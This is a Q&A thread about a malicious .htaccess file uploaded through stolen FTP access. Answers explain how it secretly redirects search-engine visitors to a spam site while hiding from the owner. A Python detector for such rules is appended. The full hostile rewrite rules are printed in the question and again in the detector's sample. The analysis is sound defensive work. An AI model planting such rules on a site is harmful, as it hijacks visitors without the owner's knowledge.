20

This was uploaded to one of my FTP folders. I'm not familiar with Apache, but still curious - can someone tell me what type of dastardly act this file is trying to commit? Thanks!

```apache
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
```
ovinophile
  • 1
    NICE! (In an evil sort of way...) Is basically taking everyone who's coming to your site from a search engine and redirecting them to SPAMMER.info – KPWINC Nov 03 '09 at 23:17
  • Had this happen to me once. The `.htaccess` file added to my site had about 40 blank lines at the top, just to confuse me further. – TRiG Nov 08 '10 at 11:44

3 Answers

15

That sends users that come from a search engine to the last site SPAMMER.info (see question history for actual site).

It looks for referrers in an attempt to hide from you, since you likely don't access the site via search engines. That is, if you go to the URL directly, everything seems normal. However, if you come in via a search engine, you get redirected.

Note: this does not affect web crawlers as they (googlebot, at least) don't set the referrer header.

Michael Haren
8

Any time a user from a search engine visits any page on your site, they'll be redirected to the .info spam site.

It's very sneaky - you won't notice anything is wrong as you'll normally just type the address in.

Greg
  • 1
    Since it's looking at the referrer, won't it redirect any clicks that come through a search engine? –  Nov 02 '09 at 15:51
  • Doesn't it affect links from Google as well? E.g., you search for the OP's site on Google, click on it and you're redirected since you come from Google? –  Nov 02 '09 at 15:53
  • Yes, links from search engines only (as I said in my answer) but *not* search engine crawlers/bots. This answer has been updated so it is now correct. It originally indicated that this applied to bots only. – Michael Haren Nov 02 '09 at 15:55
1

To add more - most probably your FTP credentials got leaked. Maybe you had them saved in FileZilla / Total Commander etc. There is plenty of malware stealing those and then 'going' around - logging on to FTP accounts, attaching malicious JavaScript to index.php / html or putting similar rewrite files.

pQd
  • I am facing this issue. Day after other .htaccess file gets modified, which results in internal server error. – vnix27 May 12 '11 at 14:06
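
A defender-side check for the pattern the answers above describe, as an added example that is not part of the original thread: it scans `.htaccess` text for a `RewriteRule` that redirects to a foreign host only when the `RewriteCond` lines above it test the Referer header, and it ignores blank-line padding like that mentioned in the comments. The function name, the `own_hosts` parameter and the `example.com` host are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
ANY_COND = re.compile(r'^\s*RewriteCond\b', re.I)
RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)

def find_referer_redirects(text, own_hosts=()):
    """Flag RewriteRules that send visitors to a foreign host only when the
    RewriteCond lines directly above them test the Referer header."""
    own = {h.lower() for h in own_hosts}
    findings, referer_patterns = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith('#'):
            continue  # blank padding and comments do not end a condition chain
        cond = REFERER_COND.match(line)
        if cond:
            referer_patterns.append(cond.group(1))
            continue
        if ANY_COND.match(line):
            continue  # other conditions stay part of the same chain
        rule = RULE.match(line)
        if rule and referer_patterns:
            host = urlparse(rule.group(1)).hostname  # None for local targets
            if host and host not in own:
                findings.append({'line': lineno, 'host': host,
                                 'target': rule.group(1),
                                 'referers': referer_patterns})
        referer_patterns = []  # conditions only apply to the next RewriteRule
    return findings

# Constructed sample: 40 blank lines of padding, a shortened copy of the
# uploaded rules, then two ordinary rules that should not be reported.
SAMPLE = "\n" * 40 + r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [L]
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteRule \.(jpg|png)$ https://www.example.com/hotlink.png [R,L]
"""

if __name__ == "__main__":
    for f in find_referer_redirects(SAMPLE, own_hosts={"www.example.com"}):
        print(f"line {f['line']}: Referer-gated redirect to {f['host']}")
```

Passing the site's own hostnames in `own_hosts` keeps ordinary hotlink-protection rules, which also test the Referer, out of the results.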